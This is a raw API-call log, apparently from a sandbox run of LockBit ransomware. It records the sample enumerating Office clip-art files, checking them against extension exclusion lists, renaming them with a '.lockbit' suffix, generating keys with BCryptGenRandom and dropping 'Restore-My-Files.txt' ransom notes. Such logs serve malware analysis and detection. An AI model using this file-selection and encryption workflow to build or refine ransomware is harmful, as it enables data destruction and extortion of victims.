[0162.412] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.412] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.413] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.413] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01148_.WMF") returned 1 [0162.414] lstrcmpiW (lpString1="ntldr", lpString2="NA01148_.WMF") returned 1 [0162.414] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01148_.WMF") returned 1 [0162.414] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01148_.WMF") returned -1 [0162.414] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01148_.WMF") returned -1 [0162.414] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01148_.WMF") returned 1 [0162.414] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01148_.WMF") returned -1 [0162.414] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.414] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01148_.WMF") returned=".WMF" [0162.414] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.414] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.414] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.415] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.415] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01148_.WMF.lockbit") returned 72 [0162.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01148_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.416] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.417] malloc (_Size=0x40068) returned 0x3f70048 [0162.417] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=7992) returned 1 [0162.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.488] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.490] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01148_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01148_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.490] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.490] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.492] free (_Block=0x1fa2ed8) [0162.492] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01148_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.492] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.492] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.492] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1248, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01149_.WMF", cAlternateFileName="")) returned 1 [0162.492] lstrcmpiW (lpString1=".", lpString2="NA01149_.WMF") returned -1 [0162.492] lstrcmpiW (lpString1="..", lpString2="NA01149_.WMF") returned -1 [0162.492] PathFindExtensionW (pszPath="NA01149_.WMF") returned=".WMF" [0162.492] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.492] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.492] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.492] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.492] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.493] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.493] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.494] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01149_.WMF") returned 1 [0162.494] lstrcmpiW (lpString1="ntldr", lpString2="NA01149_.WMF") returned 1 [0162.494] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01149_.WMF") returned 1 [0162.494] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01149_.WMF") returned -1 [0162.494] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01149_.WMF") returned -1 [0162.494] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01149_.WMF") returned 1 [0162.495] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01149_.WMF") returned -1 [0162.495] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.495] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01149_.WMF") returned=".WMF" [0162.495] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.495] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.495] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.496] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.496] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.496] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.496] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.496] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.496] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.496] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.496] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01149_.WMF.lockbit") returned 72 [0162.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01149_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01149_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.500] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.500] malloc (_Size=0x40068) returned 0x3df0008 [0162.500] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4680) returned 1 [0162.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.502] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.504] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01149_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01149_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.504] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.504] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.505] free (_Block=0x1fa2ed8) [0162.505] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01149_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.505] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.506] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.506] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7738900, ftCreationTime.dwHighDateTime=0x1bd4afc, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7738900, ftLastWriteTime.dwHighDateTime=0x1bd4afc, nFileSizeHigh=0x0, nFileSizeLow=0x2230, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01152_.WMF", cAlternateFileName="")) returned 1 [0162.506] lstrcmpiW (lpString1=".", lpString2="NA01152_.WMF") returned -1 [0162.506] lstrcmpiW (lpString1="..", lpString2="NA01152_.WMF") returned -1 [0162.506] PathFindExtensionW (pszPath="NA01152_.WMF") returned=".WMF" [0162.506] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.506] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.507] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.507] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01152_.WMF") returned 1 [0162.508] lstrcmpiW (lpString1="ntldr", lpString2="NA01152_.WMF") returned 1 [0162.508] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01152_.WMF") returned 1 [0162.508] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01152_.WMF") returned -1 [0162.508] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01152_.WMF") returned -1 [0162.508] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01152_.WMF") returned 1 [0162.508] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01152_.WMF") returned -1 [0162.508] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.508] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01152_.WMF") returned=".WMF" [0162.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.508] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.508] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.509] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.509] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01152_.WMF.lockbit") returned 72 